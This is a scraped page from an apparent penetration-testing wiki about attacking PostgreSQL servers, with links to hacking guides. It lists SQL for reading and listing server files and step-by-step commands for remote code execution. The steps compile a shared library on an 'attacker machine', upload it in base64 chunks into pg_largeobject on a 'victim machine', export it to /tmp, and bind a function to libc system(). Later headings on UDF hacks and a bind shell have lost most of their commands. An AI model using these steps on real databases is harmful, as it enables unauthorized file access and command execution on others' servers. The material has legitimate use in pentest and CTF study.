search

postgresql

POSTGRESQL

Hacking Postgres https://github.com/nixawk/pentest-wiki/blob/master/2.Vulnerability-Assessment/Database-Assessment/postgresql/postgresql_hacking.mdarrow-up-right

Basic Knowledge of Postgresql https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9arrow-up-right

How to get command execution with 9.x Postgresql https://www.dionach.com/blog/postgresql-9x-remote-command-executionarrow-up-right

Download Postgresql https://www.enterprisedb.com/downloads/postgres-postgresql-downloadsarrow-up-right

Repository https://www.postgresql.org/ftp/source/arrow-up-right

select pg_read_file('postgresql.conf');

select pg_ls_dir('./');

Authors: < nixawkarrow-up-right >

##############

Read Files

CREATE TABLE word(t TEXT); COPY word FROM '/var/lib/postgresql/flag.txt'; SELECT * FROM word limit 1 offset 0;

##############

#####################################

RAW Steps to command execution

#####################################

On Attacker Machine

gcc -I$(/opt/PostgreSQL/9.6/bin/pg_config --includedir-server) -shared -fPIC -o /opt/pgexec/pg_exec.so /opt/pgexec/pg_exec.c

Now upload the pg_exec.so to the victim machine

On Victim Machine

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE c STRICT;

\set c0 base64 -w 0 /tmp/xaa INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 0, decode(:'c0', 'base64'));

\set c1 base64 -w 0 /tmp/xab INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 1, decode(:'c1', 'base64'));

\set c2 base64 -w 0 /tmp/xac INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 2, decode(:'c2', 'base64'));

\set c3 base64 -w 0 /tmp/xad INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 3, decode(:'c3', 'base64'));

\set c4 base64 -w 0 /tmp/xae INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 4, decode(:'c4', 'base64'));

\set c5 base64 -w 0 /tmp/xaf INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 5, decode(:'c5', 'base64'));

\set c6 base64 -w 0 /tmp/xag INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 6, decode(:'c6', 'base64'));

\set c7 base64 -w 0 /tmp/xah INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 7, decode(:'c7', 'base64'));

SELECT lo_export(16420, '/tmp/pg_exec.so');

hashtag
POSTGRESQL HACK#

hashtag
DATABASE CONNECTION##

Please connect to postgresql database,

hashtag
DATABASE COMMANDS##

hashtag
LIST DATABASES###

hashtag
LIST DATABASE USERS###

Please try more details about postgresql database.

hashtag
LIST DIRECTORY##

hashtag
READ FILE##

method1

method2

hashtag
WRITE FILE##

hashtag
UDF HACK##

hashtag
COMPILE SOURCE###

hashtag
COMMAND EXECUTION###

transfrom udf.so to hex strings.

upload udf.so with databse features.

Library is too large, and we need to split it to some pieces. Please read https://github.com/sqlmapproject/sqlmap/issues/1170arrow-up-right.

upload library successfully, and then create Postgresql FUNCTION.

Execute commands with sys_exec, and nothing returns.

Please clear functions after commands execution.

hashtag
BIND SHELL###

compile source code,

copy nc.so to postgresql tmp path, or you can upload so file with database features.

create FUNCTION exec for bind shell. And client connects to target.

hashtag
METASPLOIT POSTGRESQL MODULES##

hashtag
REFERENCES#

https://github.com/sqlmapproject/udfhack/arrow-up-right https://github.com/sqlmapproject/sqlmap/issues/1170arrow-up-right http://zone.wooyun.org/content/4971arrow-up-right http://drops.wooyun.org/tips/6449arrow-up-right http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.htmlarrow-up-right

Previouscertificate_tls_and_sslNextphysical_hacking--bash_bunny

Last updated

Was this helpful?